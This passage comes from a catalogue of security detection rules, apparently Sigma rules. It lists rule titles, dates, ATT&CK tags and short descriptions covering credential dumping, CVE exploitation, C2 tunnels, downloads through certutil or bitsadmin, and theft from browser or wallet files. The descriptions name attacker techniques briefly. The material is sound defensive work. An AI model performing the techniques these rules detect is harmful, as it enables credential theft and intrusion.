    This rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert.

  • LSASS Process Memory Dump Creation Via Taskmgr.EXE

    Sep 2, 2024 · attack.credential-access attack.t1003.001

    Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.

  • New Okta User Created

    Sep 2, 2024 · attack.credential-access

    Detects new user account creation.

  • Obfuscated IP Via CLI

    Sep 2, 2024 · attack.discovery

    Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line.

  • Okta 2023 Breach Indicator Of Compromise

    Sep 2, 2024 · attack.credential-access detection.emerging-threats

    Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach. This rule can be enhanced by filtering out known and legitimate usernames used in your environment.

  • Okta Admin Functions Access Through Proxy

    Sep 2, 2024 · attack.credential-access

    Detects access to Okta admin functions through proxy.

  • OneNote.EXE Execution of Malicious Embedded Scripts

    Sep 2, 2024 · attack.defense-evasion attack.t1218.001

    Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.

  • Onyx Sleet APT File Creation Indicators

    Sep 2, 2024 · attack.execution detection.emerging-threats

    Detects file creation activity that is related to Onyx Sleet APT activity

  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon

    Sep 2, 2024 · attack.initial-access attack.t1190 cve.2021-44228 detection.emerging-threats

    Detects potential initial exploitation attempts against VMware Horizon deployments running vulnerable versions of Log4j.

  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution

    Sep 2, 2024 · attack.execution attack.initial-access attack.t1059.006 attack.t1190 cve.2022-22954 detection.emerging-threats

    Detects potential exploitation attempts of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, as part of the attack chain, threat actors used PowerShell commands that executed as child processes of the legitimate Tomcat "prunsrv.exe" process.

  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader

    Sep 2, 2024 · attack.persistence attack.t1505.001 cve.2023-27363 detection.emerging-threats

    Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.

  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

    Sep 2, 2024 · attack.defense-evasion attack.t1564.004

    Detects the creation of a hidden file or folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe".

  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

    Sep 2, 2024 · attack.defense-evasion attack.t1564.004

    Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"

  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy

    Sep 2, 2024 · attack.initial-access attack.t1190 cve.2023-43621 detection.emerging-threats

    Detects, in proxy logs, exploitation attempts of CVE-2023-43261, an information disclosure vulnerability in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components.

  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web

    Sep 2, 2024 · attack.initial-access attack.t1190 cve.2023-43621 detection.emerging-threats

    Detects, in web access logs, exploitation attempts of CVE-2023-43261, an information disclosure vulnerability in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components.

  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE

    Sep 2, 2024 · attack.execution attack.t1059 cve.2023-34362 detection.emerging-threats

    Detects the execution of "csc.exe" via the "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files.

    MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\([a-z0-9]{5,12})\([a-z0-9]{5,12})\App_Web_[a-z0-9]{5,12}.dll.

    Hunting Opportunity

    Events from IIS dynamically compiling binaries via "csc.exe" on behalf of the MOVEit application, especially since May 27th, should be investigated.

  • Potential Okta Password in AlternateID Field

    Sep 2, 2024 · attack.credential-access attack.t1552

    Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.

  • Potentially Suspicious Child Process Of VsCode

    Sep 2, 2024 · attack.execution attack.defense-evasion attack.t1218 attack.t1202

    Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

  • Potentially Suspicious Office Document Executed From Trusted Location

    Sep 2, 2024 · attack.defense-evasion attack.t1202

    Detects the execution of an Office application that points to a document located in a trusted location. Attackers often use this to avoid macro security controls and execute their malicious code.

  • PowerShell Module File Created By Non-PowerShell Process

    Sep 2, 2024 · attack.persistence

    Detects the creation of a new PowerShell module file (".psm1", ".psd1", ".dll", ".ps1", etc.) by a non-PowerShell process

  • PowerShell Script Execution Policy Enabled

    Sep 2, 2024 · attack.execution

    Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

  • Python Function Execution Security Warning Disabled In Excel

    Sep 2, 2024 · attack.defense-evasion attack.t1562.001

    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.

  • Raspberry Robin Initial Execution From External Drive

    Sep 2, 2024 · attack.execution attack.t1059.001 detection.emerging-threats

    Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".

  • Raspberry Robin Subsequent Execution of Commands

    Sep 2, 2024 · attack.execution attack.t1059.001 detection.emerging-threats

    Detects the subsequent execution of commands by the Raspberry Robin malware.

  • Remote Access Tool - ScreenConnect Command Execution

    Sep 2, 2024 · attack.execution attack.t1059.003

    Detects command execution via ScreenConnect RMM

  • Remote Access Tool - ScreenConnect File Transfer

    Sep 2, 2024 · attack.execution attack.t1059.003

    Detects files being transferred via ScreenConnect RMM

  • Remote Access Tool - ScreenConnect Temporary File

    Sep 2, 2024 · attack.execution attack.t1059.003

    Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries are dropped to ":\Users\<username>\Documents\ConnectWiseControl\Temp" before execution.

  • Renamed CURL.EXE Execution

    Sep 2, 2024 · attack.execution attack.t1059 attack.defense-evasion attack.t1202

    Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields

  • Renamed VsCode Code Tunnel Execution - File Indicator

    Sep 2, 2024 · attack.command-and-control

    Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode.

  • Security Software Discovery Via Powershell Script

    Sep 2, 2024 · attack.discovery attack.t1518.001

    Detects calls to "get-process" where the output is piped to a "where-object" filter to search for security solution processes. Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus.

  • Serpent Backdoor Payload Execution Via Scheduled Task

    Sep 2, 2024 · attack.execution attack.persistence attack.t1053.005 attack.t1059.006 detection.emerging-threats

    Detects a post-exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious Windows event and a trigger so that, once the event is created, it executes the payload.

  • Suspicious LNK Double Extension File Created

    Sep 2, 2024 · attack.defense-evasion attack.t1036.007

    Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

  • Suspicious Sysmon as Execution Parent

    Sep 2, 2024 · attack.privilege-escalation attack.t1068 cve.2022-41120 detection.emerging-threats

    Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)

  • Ursnif Redirection Of Discovery Commands

    Sep 2, 2024 · attack.execution attack.t1059 detection.emerging-threats

    Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.

  • Visual Studio Code Tunnel Execution

    Sep 2, 2024 · attack.command-and-control attack.t1071.001

    Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel.

  • Visual Studio Code Tunnel Remote File Creation

    Sep 2, 2024 · attack.command-and-control

    Detects the creation of a file by the "node.exe" process in the ".vscode-server" directory. This could be a sign of remote file creation via the VsCode tunnel feature.

  • Visual Studio Code Tunnel Service Installation

    Sep 2, 2024 · attack.command-and-control attack.t1071.001

    Detects the installation of VsCode tunnel (code-tunnel) as a service.

  • Visual Studio Code Tunnel Shell Execution

    Sep 2, 2024 · attack.command-and-control attack.t1071.001

    Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.

  • A Rule Has Been Deleted From The Windows Firewall Exception List

    Aug 29, 2024 · attack.defense-evasion attack.t1562.004

    Detects when a single rule or all of the rules have been deleted from the Windows Defender Firewall

  • Uncommon New Firewall Rule Added In Windows Firewall Exception List

    Aug 29, 2024 · attack.defense-evasion attack.t1562.004

    Detects when a rule has been added to the Windows Firewall exception list

  • System Network Discovery - macOS

    Aug 29, 2024 · attack.discovery attack.t1016

    Detects enumeration of local network configuration

  • Antivirus Filter Driver Disallowed On Dev Drive - Registry

    Aug 29, 2024 · attack.defense-evasion attack.t1562.001

    Detects activity that indicates a user disabling the ability of the antivirus mini filter to inspect a "Dev Drive".

  • Emotet Loader Execution Via .LNK File

    Aug 29, 2024 · attack.execution attack.t1059.006 detection.emerging-threats

    Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.

  • FakeUpdates/SocGholish Activity

    Aug 29, 2024 · attack.execution attack.t1059.001 detection.emerging-threats

    Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.

  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell

    Aug 29, 2024 · attack.discovery attack.t1135

    Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.

  • HackTool - SharpWSUS/WSUSpendu Execution

    Aug 29, 2024 · attack.execution attack.lateral-movement attack.t1210

    Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.

  • Hiding User Account Via SpecialAccounts Registry Key

    Aug 29, 2024 · attack.defense-evasion attack.t1564.002

    Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen.

  • Potential AMSI Bypass Via .NET Reflection

    Aug 29, 2024 · attack.defense-evasion attack.t1562.001

    Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning

  • Potential CVE-2022-29072 Exploitation Attempt

    Aug 29, 2024 · attack.execution cve.2022-29072 detection.emerging-threats

    Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.

  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity

    Aug 29, 2024 · attack.initial-access attack.t1190 cve.2023-34362 detection.emerging-threats

    Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.

  • Potential Privilege Escalation via Local Kerberos Relay over LDAP

    Aug 29, 2024 · attack.privilege-escalation attack.credential-access attack.t1548

    Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.

  • Python Function Execution Security Warning Disabled In Excel - Registry

    Aug 29, 2024 · attack.defense-evasion attack.t1562.001

    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.

  • RestrictedAdminMode Registry Value Tampering

    Aug 29, 2024 · attack.defense-evasion attack.t1112

    Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.

  • RestrictedAdminMode Registry Value Tampering - ProcCreation

    Aug 29, 2024 · attack.defense-evasion attack.t1112

    Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.

  • Sdiagnhost Calling Suspicious Child Process

    Aug 29, 2024 · attack.defense-evasion attack.t1036 attack.t1218

    Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)

  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments

    Aug 29, 2024 · attack.defense-evasion attack.t1218.011

    Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.

  • Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths

    Aug 29, 2024 · attack.execution

    Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.

  • COM Object Execution via Xwizard.EXE

    Aug 29, 2024 · attack.defense-evasion attack.t1218

    Detects the execution of the Xwizard tool with the "RunWizard" flag and a GUID-like argument. This utility can be abused in order to run a custom COM object created in the registry.

  • New Capture Session Launched Via DXCap.EXE

    Aug 29, 2024 · attack.defense-evasion attack.t1218

    Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.

  • Potential DLL Injection Via AccCheckConsole

    Aug 29, 2024 · attack.execution detection.threat-hunting

    Detects the execution of "AccCheckConsole", a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run is called a "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such a DLL and pass it via the CLI, and it would then be loaded in the context of the "AccCheckConsole" utility.

  • Potential DLL Sideloading Using Coregen.exe

    Aug 29, 2024 · attack.defense-evasion attack.t1218 attack.t1055

    Detects usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.

  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities

    Aug 29, 2024 · attack.credential-access attack.discovery attack.t1552

    Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from event logs such as usernames, IP addresses, hostnames, etc.

  • Process Memory Dump via RdrLeakDiag.EXE

    Aug 29, 2024 · attack.credential-access attack.t1003.001

    Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory

  • Program Executed Using Proxy/Local Command Via SSH.EXE

    Aug 29, 2024 · attack.defense-evasion attack.t1218

    Detects usage of the "ssh.exe" binary as a proxy to launch other programs.

  • Suspicious Child Process Of Wermgr.EXE

    Aug 29, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 attack.t1036

    Detects suspicious Windows Error Reporting manager (wermgr.exe) child process

  • Uncommon Sigverif.EXE Child Process

    Aug 29, 2024 · attack.defense-evasion attack.t1216

    Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living-off-the-land binary in order to proxy execution.

  • Windows Binary Executed From WSL

    Aug 29, 2024 · attack.execution attack.defense-evasion attack.t1202

    Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships

  • Wusa.EXE Executed By Parent Process Located In Suspicious Location

    Aug 29, 2024 · attack.execution

    Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.

  • Potential Active Directory Reconnaissance/Enumeration Via LDAP

    Aug 27, 2024 · attack.discovery attack.t1069.002 attack.t1087.002 attack.t1482

    Detects potential Active Directory enumeration via LDAP

  • Disable Important Scheduled Task

    Aug 26, 2024 · attack.impact attack.t1489

    Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities

  • DNS Query To Put.io - DNS Client

    Aug 23, 2024 · attack.command-and-control

    Detects DNS queries for subdomains related to "Put.io" sharing website.

  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location

    Aug 23, 2024 · attack.command-and-control attack.t1105

    Detects a network connection initiated by programs or processes running from suspicious or uncommon file system locations.

  • Suspicious Download From File-Sharing Website Via Bitsadmin

    Aug 23, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003

    Detects usage of bitsadmin downloading a file from a suspicious domain

  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

    Aug 23, 2024 · attack.defense-evasion attack.t1027

    Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.

  • Suspicious Remote AppX Package Locations

    Aug 23, 2024 · attack.defense-evasion

    Detects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain.

  • Driver Added To Disallowed Images In HVCI - Registry

    Aug 21, 2024 · attack.defense-evasion

    Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.

  • Hidden Flag Set On File/Directory Via Chflags - MacOS

    Aug 21, 2024 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105

    Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.

  • User Risk and MFA Registration Policy Updated

    Aug 21, 2024 · attack.persistence

    Detects changes and updates to the user risk and MFA registration policy. Attackers can modify the policies to bypass MFA, weaken security thresholds, facilitate further attacks, or maintain persistence.

  • Multi Factor Authentication Disabled For User Account

    Aug 21, 2024 · attack.credential-access attack.persistence

    Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also seen in SIM swap attacks.

  • Data Export From MSSQL Table Via BCP.EXE

    Aug 20, 2024 · attack.execution attack.t1048

    Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.

  • Potentially Suspicious Rundll32.EXE Execution of UDL File

    Aug 16, 2024 · attack.execution attack.t1218.011 attack.t1071

    Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.

  • Suspicious Rundll32 Execution of UDL File

    Aug 16, 2024 · attack.execution attack.t1218.011 attack.t1071

    Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse the technique as a phishing vector to capture authentication credentials or other sensitive data.

  • Diskshadow Script Mode - Execution From Potential Suspicious Location

    Aug 16, 2024 · attack.defense-evasion attack.t1218

    Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.

  • HackTool - LaZagne Execution

    Aug 16, 2024 · attack.credential-access

    Detects the execution of LaZagne, a utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump credentials.

  • Capture Wi-Fi password

    Aug 14, 2024

    Capture Wi-Fi password

  • Powershell Token Obfuscation - Powershell

    Aug 13, 2024 · attack.defense-evasion attack.t1027.009

    Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

  • 7Zip Compressing Dump Files

    Aug 12, 2024 · attack.collection attack.t1560.001

    Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.

  • A Member Was Added to a Security-Enabled Global Group

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects activity when a member is added to a security-enabled global group

  • A Member Was Removed From a Security-Enabled Global Group

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects activity when a member is removed from a security-enabled global group

  • A New Trust Was Created To A Domain

    Aug 12, 2024 · attack.persistence attack.t1098

    The addition of a domain trust is rare and should be verified for legitimacy.

  • A Security-Enabled Global Group Was Deleted

    Aug 12, 2024 · attack.persistence attack.t1098

    Detects activity when a security-enabled global group is deleted.

  • Abusable DLL Potential Sideloading From Suspicious Location

    Aug 12, 2024 · attack.execution attack.t1059

    Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations.

  • Abuse of Service Permissions to Hide Services Via Set-Service

    Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011

    Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe" and "Get-Service" (works only in PowerShell 7).

  • Abuse of Service Permissions to Hide Services Via Set-Service - PS

    Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011

    Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe" and "Get-Service" (works only in PowerShell 7).

  • Abused Debug Privilege by Arbitrary Parent Processes

    Aug 12, 2024 · attack.privilege-escalation attack.t1548

    Detects unusual child processes spawned by various system processes.

  • Abusing Print Executable

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Attackers can use print.exe for remote file copy.

  • Access To ADMIN$ Network Share

    Aug 12, 2024 · attack.lateral-movement attack.t1021.002

    Detects access to the ADMIN$ network share.

  • Access to Browser Login Data

    Aug 12, 2024 · attack.credential-access attack.t1555.003

    Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

  • Access To Crypto Currency Wallets By Uncommon Applications

    Aug 12, 2024 · attack.t1003 attack.credential-access

    Detects file access requests to cryptocurrency wallet files by uncommon processes. Could indicate an attempt to steal cryptocurrency wallets.

  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications

    Aug 12, 2024 · attack.credential-access attack.t1552.006

    Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

  • Access To Windows Credential History File By Uncommon Applications

    Aug 12, 2024 · attack.credential-access attack.t1555.004

    Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. An example would be usage of the mimikatz "dpapi::credhist" function.

  • Access To Windows DPAPI Master Keys By Uncommon Applications

    Aug 12, 2024 · attack.credential-access attack.t1555.004

    Detects file access requests to the Windows Data Protection API master keys by an uncommon application. This can be a sign of credential stealing. An example would be usage of the mimikatz "dpapi::masterkey" function.

  • Account Created And Deleted Within A Close Time Frame

    Aug 12, 2024 · attack.defense-evasion attack.t1078

    Detects when an account was created and deleted in a short period of time.

  • Account Disabled or Blocked for Sign in Attempts

    Aug 12, 2024 · attack.initial-access attack.t1078.004

    Detects when an account that is disabled or blocked from signing in attempts to log in.

  • Account Lockout

    Aug 12, 2024 · attack.credential-access attack.t1110

    Identifies a user account that has been locked because the user tried to sign in too many times with an incorrect user ID or password.

  • Account Tampering - Suspicious Failed Logon Reasons

    Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access attack.t1078

    This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

  • Activate Suppression of Windows Security Center Notifications

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects setting Notification_Suppress to 1 to disable Windows Security Center notifications.

  • Active Directory Computers Enumeration With Get-AdComputer

    Aug 12, 2024 · attack.discovery attack.t1018 attack.t1087.002

    Detects usage of the "Get-AdComputer" cmdlet to enumerate computers or their properties within Active Directory.

  • Active Directory Database Snapshot Via ADExplorer

    Aug 12, 2024 · attack.credential-access attack.t1552.001 attack.t1003.003

    Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the Active Directory database.

  • Active Directory Group Enumeration With Get-AdGroup

    Aug 12, 2024 · attack.discovery attack.t1069.002

    Detects usage of the "Get-AdGroup" cmdlet to enumerate groups within Active Directory.

  • Active Directory Kerberos DLL Loaded Via Office Application

    Aug 12, 2024 · attack.execution attack.t1204.002

    Detects the Kerberos DLL being loaded by an Office product.

  • Active Directory Parsing DLL Loaded Via Office Application

    Aug 12, 2024 · attack.execution attack.t1204.002

    Detects the DSParse DLL being loaded by an Office product.

  • Active Directory Replication from Non Machine Account

    Aug 12, 2024 · attack.credential-access attack.t1003.006

    Detects potential abuse of the Active Directory Replication Service (ADRS) from a non-machine account to request credentials.

  • Active Directory Structure Export Via Csvde.EXE

    Aug 12, 2024 · attack.exfiltration attack.discovery attack.t1087.002

    Detects the execution of "csvde.exe" in order to export the organizational Active Directory structure.

  • Active Directory Structure Export Via Ldifde.EXE

    Aug 12, 2024 · attack.exfiltration

    Detects the execution of "ldifde.exe" in order to export the organizational Active Directory structure.

  • Activity From Anonymous IP Address

    Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access

    Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.

  • Activity from Anonymous IP Addresses

    Aug 12, 2024 · attack.command-and-control attack.t1573

    Detects when Microsoft Cloud App Security reports that users were active from an IP address that has been identified as an anonymous proxy IP address.

  • Activity from Infrequent Country

    Aug 12, 2024 · attack.command-and-control attack.t1573

    Detects when Microsoft Cloud App Security reports an activity from a location that was not recently visited, or was never visited, by any user in the organization.

  • Activity from Suspicious IP Addresses

    Aug 12, 2024 · attack.command-and-control attack.t1573

    Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account.

  • Activity Performed by Terminated User

    Aug 12, 2024 · attack.impact

    Detects when Microsoft Cloud App Security reports users whose accounts were terminated in Azure AD but who still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.

  • AD Groups Or Users Enumeration Using PowerShell - PoshModule

    Aug 12, 2024 · attack.discovery attack.t1069.001

    Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock

    Aug 12, 2024 · attack.discovery attack.t1069.001

    Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

  • AD Object WriteDAC Access

    Aug 12, 2024 · attack.defense-evasion attack.t1222.001

    Detects WRITE_DAC access to a domain object.

  • AD Privileged Users or Groups Reconnaissance

    Aug 12, 2024 · attack.discovery attack.t1087.002

    Detects reconnaissance of privileged users or groups based on event ID 4661 and the SIDs of known privileged users or groups.

  • ADCS Certificate Template Configuration Vulnerability

    Aug 12, 2024 · attack.privilege-escalation attack.credential-access

    Detects certificate creation with a template allowing risky subject permissions.

  • ADCS Certificate Template Configuration Vulnerability with Risky EKU

    Aug 12, 2024 · attack.privilege-escalation attack.credential-access

    Detects certificate creation with a template allowing risky subject permissions and a risky EKU.

  • Add Debugger Entry To AeDebug For Persistence

    Aug 12, 2024 · attack.persistence

    Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence; the configured debugger is invoked when an application crashes.

  • Add Debugger Entry To Hangs Key For Persistence

    Aug 12, 2024 · attack.persistence

    Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence; the configured debugger is invoked when an application crashes.

  • Add DisallowRun Execution to Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects setting DisallowRun to 1 to prevent users from running specific programs.

  • Add Insecure Download Source To Winget

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059

    Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos).

  • Add New Download Source To Winget

    Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059

    Detects usage of winget to add new additional download sources.

  • Add or Remove Computer from DC

    Aug 12, 2024 · attack.defense-evasion attack.t1207

    Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.

  • Add SafeBoot Keys Via Reg Utility

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attackers to allow ransomware to run in safe mode, where some security products do not.

  • Add Windows Capability Via PowerShell Cmdlet

    Aug 12, 2024 · attack.execution

    Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

  • Add Windows Capability Via PowerShell Script

    Aug 12, 2024 · attack.execution

    Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

  • Added Credentials to Existing Application

    Aug 12, 2024 · attack.t1098.001 attack.persistence

    Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.

  • Added Owner To Application

